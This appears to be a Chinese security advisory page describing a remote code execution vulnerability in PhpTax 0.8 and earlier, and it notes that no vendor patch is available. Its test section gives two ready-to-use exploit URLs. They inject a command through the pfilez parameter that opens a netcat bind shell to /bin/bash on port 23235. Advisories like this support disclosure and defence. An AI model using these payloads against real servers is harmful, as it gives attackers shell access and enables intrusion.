发布日期:2012-10-15
更新日期:2012-10-18受影响系统:
sourceforge PhpTax <= 0.8
描述:
--------------------------------------------------------------------------------
PhpTax是美国收入所得税计算软件。PhpTax在实现上存在安全漏洞,可被利用导致远程代码执行攻击。<*来源:Jean Pascal Pereira
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Bindshell on port 23235 using netcat:http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make建议:
--------------------------------------------------------------------------------
厂商补丁:sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://jocr.sourceforge.net/index.htmlQNX QCONN远程命令执行漏洞Novell ZENWorks Asset Management信息泄露漏洞(CVE-2012-4933)相关资讯 远程代码执行漏洞 PhpTax安全漏洞 PhpTax
- Microsoft Windows OLE远程代码执 (11/14/2014 12:13:56)
- Novell ZENWorks AdminStudio (03/26/2013 18:45:20)
- Novell Groupwise Client ActiveX (02/02/2013 07:25:44)
| - HP System Management Homepage " (04/03/2013 13:59:17)
- Oracle Hyperion Financial (03/14/2013 15:00:59)
- Novell Groupwise Client多个不明 (02/02/2013 07:22:58)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|
易网时代-编程资源站